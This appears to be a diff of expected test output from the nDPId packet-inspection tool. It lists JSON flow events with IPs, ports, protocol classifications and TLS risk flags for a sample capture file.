-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104381237,"flow_last_seen":1470104402191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2520,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104402238,"flow_last_seen":1470104408999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104414296,"flow_last_seen":1470104423193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":997,"flow_tot_l4_payload_len":2088,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1470104423246,"flow_last_seen":1470104429322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104376017,"flow_last_seen":1470104433033,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1470104381237,"flow_last_seen":1470104402191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2520,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1470104402238,"flow_last_seen":1470104408999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1470104414296,"flow_last_seen":1470104423193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":997,"flow_tot_l4_payload_len":2088,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1470104423246,"flow_last_seen":1470104429322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104376017,"flow_last_seen":1470104433033,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104395656,"flow_last_seen":1470104425762,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.10.7","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104395656,"flow_last_seen":1470104425762,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.10.7","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378557,"flow_last_seen":1470104408662,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.125.30","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378557,"flow_last_seen":1470104408662,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.125.30","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399958,"flow_last_seen":1470104400059,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399958,"flow_last_seen":1470104400059,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396888,"flow_last_seen":1470104396987,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430065,"flow_last_seen":1470104430476,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396888,"flow_last_seen":1470104396987,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 